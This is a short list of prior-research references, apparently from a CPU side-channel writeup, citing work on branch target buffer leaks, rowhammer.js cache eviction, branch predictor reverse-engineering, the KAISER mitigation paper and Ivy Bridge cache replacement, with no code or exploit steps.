http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm's research based on this provided the basic idea behind variant 2.
https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
https://www.sophia.re/thesis.pdf: Sophia D'Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
https://www.jilp.org/: This journal contains many articles on branch prediction.
http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel's Ivy Bridge architecture.